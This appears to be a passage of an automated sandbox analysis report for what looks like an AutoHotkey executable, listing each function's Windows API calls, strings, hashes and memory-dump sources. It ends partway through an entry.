Part of subcall function 000000014004E230: GetForegroundWindow.USER32 ref: 000000014004E270
Part of subcall function 000000014004E230: IsWindowVisible.USER32 ref: 000000014004E291

GetWindowThreadProcessId.USER32 ref: 000000014003E5FA
GetGUIThreadInfo.USER32 ref: 000000014003E607
GetClassNameW.USER32 ref: 000000014003E63A
EnumChildWindows.USER32 ref: 000000014003E664

Strings

H, xrefs: 000000014003E5EF

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Window$Thread$ChildClassEnumForegroundInfoNameProcessVisibleWindows
String ID: H
API String ID: 1990429777-2852464175
Opcode ID: c4a967081132b180023e5a0c770ab085ab4c36b7aa2dfd919d59f32f66499845
Instruction ID: 25e32a3220e28f1f885f477415264d4c6f2190e6f12a6d53795fec65feba18f5
Opcode Fuzzy Hash: c4a967081132b180023e5a0c770ab085ab4c36b7aa2dfd919d59f32f66499845
Instruction Fuzzy Hash: 45417772208BC085E7229B22A444BCA67A0F799BE4F545316FBA903BF9CF7CC145CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000014004E3F0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 77timeCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 000000014004E435
GetLocalTime.KERNEL32 ref: 000000014004E45E

Strings

MSec, xrefs: 000000014004E418
MZ@, xrefs: 000000014004E4DE
%03d, xrefs: 000000014004E476

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CountLocalTickTime
String ID: %03d$MSec$MZ@
API String ID: 173086840-1140963086
Opcode ID: e2222e691f0cb4139e793bbcb0bbb820679d5585bf62cd44848837134d7afc03
Instruction ID: 4d6507f7502828b3695c1198b7aa7410acf8026630a86c69730d5037a04346e9
Opcode Fuzzy Hash: e2222e691f0cb4139e793bbcb0bbb820679d5585bf62cd44848837134d7afc03
Instruction Fuzzy Hash: BD31D472702A9186EB26D726A5403B973A1F79CBE4F464220FF9547BF5DB38C8408354

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003D596, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70clipboardCOMMON

Download Yara Rule

APIs

CountClipboardFormats.USER32 ref: 000000014003D5A0
IsClipboardFormatAvailable.USER32 ref: 000000014003D5B8
IsClipboardFormatAvailable.USER32 ref: 000000014003D5C9
GetTickCount.KERNEL32 ref: 000000014003D6E7

Strings

MZ@, xrefs: 000000014003D712, 000000014003D74A

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Clipboard$AvailableCountFormat$FormatsTick
String ID: MZ@
API String ID: 683467497-2978689999
Opcode ID: 7177ec330ae007f50ada319712f7b17d81b3844464b2fe5e4d9989a441739790
Instruction ID: cb9884ef53b759c48cc579ce2859289a6e01d74ccd71e710bbf32bc8b7fb561e
Opcode Fuzzy Hash: 7177ec330ae007f50ada319712f7b17d81b3844464b2fe5e4d9989a441739790
Instruction Fuzzy Hash: 3E314A76208A8085F7679B26B4947EA3764FB4CBD5F14401BEB89837B5DE38C5868B01

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140088300, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 0000000140088331
RegQueryValueExW.ADVAPI32 ref: 000000014008836D
RegCloseKey.ADVAPI32 ref: 000000014008837A

Strings

InstallDir, xrefs: 000000014008834E
SOFTWARE\AutoHotkey, xrefs: 0000000140088317

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID: InstallDir$SOFTWARE\AutoHotkey
API String ID: 3677997916-1488329376
Opcode ID: b7fc9a68084ac26dbba2d4b62c3734f987b0fbb3ffa0e123af9a6c1ec280565c
Instruction ID: b46a5f334df3de562241437d93812bab387530a1b5bdaa379adca5c7821a9cf7
Opcode Fuzzy Hash: b7fc9a68084ac26dbba2d4b62c3734f987b0fbb3ffa0e123af9a6c1ec280565c
Instruction Fuzzy Hash: C821837271874082EB698B15F49075EB7A1F798BE0F500129FB8983FB8DB78D690CB44

Uniqueness

Uniqueness Score: -1.00%

Function 000000014008C660, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000000014008C6AE
GetProcAddress.KERNEL32 ref: 000000014008C6BE

Strings

IsHungAppWindow, xrefs: 000000014008C6B7
user32, xrefs: 000000014008C6A7

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: IsHungAppWindow$user32
API String ID: 1646373207-934392274
Opcode ID: 460282bcd359a50b6834243c01f798b9204e5372765712d2bff82725c1024d7e
Instruction ID: 7013b20592b556f4ca4d87ed041603b614820b2aa0a731502baab156e12d16fe
Opcode Fuzzy Hash: 460282bcd359a50b6834243c01f798b9204e5372765712d2bff82725c1024d7e
Instruction Fuzzy Hash: CD114CB1311B4182EF16DB66E82179933A0BB8C794F444129AB8E53BB0EF3CC9998701

Uniqueness

Uniqueness Score: -1.00%

Function 000000014007D420, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 47libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400A2B14: RtlAcquirePebLock.NTDLL ref: 00000001400A2B24

GetModuleHandleW.KERNEL32 ref: 000000014007D469
GetProcAddress.KERNEL32 ref: 000000014007D479

Part of subcall function 00000001400A2AB4: RtlAcquirePebLock.NTDLL ref: 00000001400A2AC4
Part of subcall function 00000001400A2AB4: RtlLeaveCriticalSection.NTDLL ref: 00000001400A2B04

Strings

(, xrefs: 000000014007D4A9
user32, xrefs: 000000014007D462
SetMenuInfo, xrefs: 000000014007D472

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: AcquireLock$AddressCriticalHandleLeaveModuleProcSection
String ID: ($SetMenuInfo$user32
API String ID: 242699652-1041946166
Opcode ID: ff91a750c1ee5a5505ceec73c1c2fe2d11964e6f602765e4ec0870e97c8f27cc
Instruction ID: c2e264c6a098d8896ed0c7d43359ec6ea6143a294eff6460fb305e6e1ca85277
Opcode Fuzzy Hash: ff91a750c1ee5a5505ceec73c1c2fe2d11964e6f602765e4ec0870e97c8f27cc
Instruction Fuzzy Hash: 45111772205B4186EB61CB2AF99439A73A0F74DB94F404226AB9D93BB5DF3CD495CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000014004E340, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetDateFormatW.KERNEL32 ref: 000000014004E3D0

Strings

dddd, xrefs: 000000014004E398
MMM, xrefs: 000000014004E388
MMMM, xrefs: 000000014004E381
ddd, xrefs: 000000014004E39F

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: DateFormat
String ID: MMM$MMMM$ddd$dddd
API String ID: 2793631785-2187213731
Opcode ID: bca38b2adc25e74bc28bd2bb32bff7a0425e3e0f3123ed476951840947092a77
Instruction ID: e4c5ffcde9e080c5a798627b89fdef35c502dd8aa0d84f2311ee2c67c70f57c4
Opcode Fuzzy Hash: bca38b2adc25e74bc28bd2bb32bff7a0425e3e0f3123ed476951840947092a77
Instruction Fuzzy Hash: 7B11E571608A9083FB168F27E5407AD6361F7497E0F458235F75943AF4DB38CA818708

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140089280, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 000000014008929E
GetProcAddress.KERNEL32 ref: 00000001400892B6
FreeLibrary.KERNEL32 ref: 00000001400892D9

Strings

uxtheme, xrefs: 0000000140089297
SetWindowTheme, xrefs: 00000001400892AC

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Library$AddressFreeLoadProc
String ID: SetWindowTheme$uxtheme
API String ID: 145871493-1369271589
Opcode ID: 898628f0a845768fa5ec0d5347ec4af9ca6c3f5e41736b354577621db4e99c55
Instruction ID: 00abd133513083138add5f7d4fc67f072fa39a0dac3692364da3531d978be57f
Opcode Fuzzy Hash: 898628f0a845768fa5ec0d5347ec4af9ca6c3f5e41736b354577621db4e99c55
Instruction Fuzzy Hash: B4F0F931319B8491EA5AAB57F89439523A0BB5CBD0F485125FE1D93B74DF3CCA45C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000A5C0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26synchronizationCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 000000014000A5D6
CreateMutexW.KERNEL32 ref: 000000014000A5E7
GetLastError.KERNEL32 ref: 000000014000A5F0
CloseHandle.KERNEL32 ref: 000000014000A60E

Strings

AHK Mouse, xrefs: 000000014000A5DC

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CloseHandle$CreateErrorLastMutex
String ID: AHK Mouse
API String ID: 2372642624-1022267635
Opcode ID: 5ba0e858e0a64ea442cc1f244bec11736160f08b04bc570a00e694196d1003d1
Instruction ID: 112b8e7dcfeb0d271e8d0ab532654c2af9f396adcde29a99ff9b197de46fe104
Opcode Fuzzy Hash: 5ba0e858e0a64ea442cc1f244bec11736160f08b04bc570a00e694196d1003d1
Instruction Fuzzy Hash: 64F05E71214B44C2FB1ACB23F8643EA22A1BB8CBC4F484425E74647AB0CF7DC4958700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003E150, Relevance: 7.7, APIs: 5, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 000000014004E230: GetForegroundWindow.USER32 ref: 000000014004E270
Part of subcall function 000000014004E230: IsWindowVisible.USER32 ref: 000000014004E291

GetWindowRect.USER32 ref: 000000014003E243
GetWindowRect.USER32 ref: 000000014003E278
GetParent.USER32 ref: 000000014003E2A7
ScreenToClient.USER32 ref: 000000014003E2BD
MoveWindow.USER32 ref: 000000014003E314

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClientForegroundMoveParentScreenVisible
String ID:
API String ID: 2720414154-0
Opcode ID: 268eec0f9823e20cd8a7d6d1435563bbc8b47eae1ec502d38de2b594efdbea1e
Instruction ID: c2ac69cb3d505dc10e94306d0aabd8436b7fa990e38f3fba2258cc568f121f5f
Opcode Fuzzy Hash: 268eec0f9823e20cd8a7d6d1435563bbc8b47eae1ec502d38de2b594efdbea1e
Instruction Fuzzy Hash: 41716732A002808AFB16DF6794847EE27A0B74DBD8F144615FF1A57BE5DB38C981CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400125F0, Relevance: 7.6, APIs: 5, Instructions: 146COMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 00000001400126AD
GetSystemMetrics.USER32 ref: 0000000140012707
GetSystemMetrics.USER32 ref: 0000000140012717
GetCursorPos.USER32 ref: 000000014001277A

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CursorMetricsSystem
String ID:
API String ID: 3091566494-0
Opcode ID: 8018263ac9781f4bcd704af851d3a09354d684827c0099ba387d3ed5c089359c
Instruction ID: 8a4d251bf4e3a752c2b5a307d69f5b753c0c720296eb79ccb08563c88dc78100
Opcode Fuzzy Hash: 8018263ac9781f4bcd704af851d3a09354d684827c0099ba387d3ed5c089359c
Instruction Fuzzy Hash: CB51A0763143508BF766DF1BE940B9A77A1B758BD0F004018FB8687AA5DB3AC864CF14

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000D6E0, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 146COMMON

Download Yara Rule

Strings

& , xrefs: 000000014000D8DB, 000000014000D90D
MZ@, xrefs: 000000014000D797
Up, xrefs: 000000014000D770, 000000014000D9B9

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID: & $ Up$MZ@
API String ID: 0-1529032960
Opcode ID: 1934011b4b23b1200ec3272813d79903a39b74b4b060d35836f3bdb9306172d6
Instruction ID: bda84450eea8ca4dcae6f63a636e50031d7266b069c70ccdde2289fddd6b4572
Opcode Fuzzy Hash: 1934011b4b23b1200ec3272813d79903a39b74b4b060d35836f3bdb9306172d6
Instruction Fuzzy Hash: 385171B271468090EB66EB17A5003F977A1FB49BD4F899123FB49437A6EB38C581C721

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000D390, Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 127COMMON

Download Yara Rule

APIs

wcsstr.LIBVCRUNTIME ref: 000000014000D3EB

Strings

& , xrefs: 000000014000D3D1
MZ@, xrefs: 000000014000D444
~, xrefs: 000000014000D589
Up, xrefs: 000000014000D457

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: wcsstr
String ID: & $ Up$MZ@$~
API String ID: 2735924446-1448277115
Opcode ID: e9d06d722ee367b61729b08ff2993cc648a734f6bf8f620eda0c869adbcc9430
Instruction ID: 2ea1114f3ac32c86956c4109d75de619b177ea18be3e457aa2dd5d6abf53c109
Opcode Fuzzy Hash: e9d06d722ee367b61729b08ff2993cc648a734f6bf8f620eda0c869adbcc9430
Instruction Fuzzy Hash: 3C51B2B6604A9085EB72D716B5003FAB7A0E7597C8F844012FF89036E9EB3DC596D721

Uniqueness

Uniqueness Score: -1.00%

Function 000000014008C040, Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32 ref: 000000014008C167
EnumChildWindows.USER32 ref: 000000014008C1AB

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: ChildEnumWindows
String ID:
API String ID: 3555792229-0
Opcode ID: 363f0ae7ba92efeec05a6b86f03369ce6a9deecbd3a311e5c22a7c5b83738dbc
Instruction ID: d2356cf2d0d641026e42e2ab5bc4170a3ea07417e983324584026f9ad2366e6b
Opcode Fuzzy Hash: 363f0ae7ba92efeec05a6b86f03369ce6a9deecbd3a311e5c22a7c5b83738dbc
Instruction Fuzzy Hash: 14415132619BC081DB369B56F5443EAB3B5F789BD0F484215EB9903BA9DF3CC2948B44

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140013170, Relevance: 7.6, APIs: 5, Instructions: 80keyboardthreadCOMMON

Download Yara Rule

APIs

GetKeyState.USER32 ref: 000000014001318D
GetKeyState.USER32 ref: 00000001400131B4
GetForegroundWindow.USER32 ref: 0000000140013204
GetWindowThreadProcessId.USER32 ref: 000000014001320F
GetKeyState.USER32 ref: 0000000140013253

Part of subcall function 0000000140010F60: GetCurrentThreadId.KERNEL32 ref: 0000000140010FAD

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: State$ThreadWindow$CurrentForegroundProcess
String ID:
API String ID: 3707567570-0
Opcode ID: 9a5abd760bd55209046415a94fbf893eccb84c62043289f53f984c6064b45e2b
Instruction ID: e296d1848d5161a97bbb0f7cd494ef8d80825c96ede701df8d492e65f9279c67
Opcode Fuzzy Hash: 9a5abd760bd55209046415a94fbf893eccb84c62043289f53f984c6064b45e2b
Instruction Fuzzy Hash: 4A31C9326086608AE376AB26A8967EE7760F7887D4F544218FBC107AB5CF7E8444DB11

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400BB6C8, Relevance: 7.6, APIs: 5, Instructions: 56COMMON

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00000001400BB6EF
_set_statfp.LIBCMT ref: 00000001400BB70A
_set_statfp.LIBCMT ref: 00000001400BB726
_set_statfp.LIBCMT ref: 00000001400BB762

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 82135ee0c62596e6123306dea27970951e95f4e3f3cada795f5fa633b0f24fe8
Instruction ID: 209d0bc88f045c164df83ff2f1421387915b26f5a0bceecbac65f7b7d6c84a62
Opcode Fuzzy Hash: 82135ee0c62596e6123306dea27970951e95f4e3f3cada795f5fa633b0f24fe8
Instruction Fuzzy Hash: D011C636698E050BF66619EBE4523E51171AB9D3F0F144224FB76076F6CEF88A414624

Uniqueness

Uniqueness Score: -1.00%

Function 000000014008B5E0, Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 000000014008B605
GetTickCount.KERNEL32 ref: 000000014008B614
IsWindow.USER32 ref: 000000014008B62E
GetTickCount.KERNEL32 ref: 000000014008B640
IsWindow.USER32 ref: 000000014008B661

Part of subcall function 0000000140062580: SendMessageTimeoutW.USER32 ref: 00000001400625AD
Part of subcall function 0000000140062580: GetWindowThreadProcessId.USER32 ref: 00000001400625BD
Part of subcall function 0000000140062580: OpenProcess.KERNEL32 ref: 00000001400625D1
Part of subcall function 0000000140062580: TerminateProcess.KERNEL32 ref: 00000001400625E4
Part of subcall function 0000000140062580: CloseHandle.KERNEL32 ref: 00000001400625ED

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: ProcessWindow$CountMessageTick$CloseHandleOpenPostSendTerminateThreadTimeout
String ID:
API String ID: 1366898224-0
Opcode ID: f4f923fb41292e7f3bc062a55cbf47a364f84cf842e49501d496acbbf6744f0d
Instruction ID: 2de54d127ff4ab1a9ea89d649ad0565ab81855e4aef54debd1d2036c21ede3b1
Opcode Fuzzy Hash: f4f923fb41292e7f3bc062a55cbf47a364f84cf842e49501d496acbbf6744f0d
Instruction Fuzzy Hash: 99018C32714B4083F75A6F23A8547EA22A1AB8CBC0F185538FB0647BB5EE38C9958740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014005E2A0, Relevance: 7.5, APIs: 5, Instructions: 37serviceCOMMON

Download Yara Rule

APIs

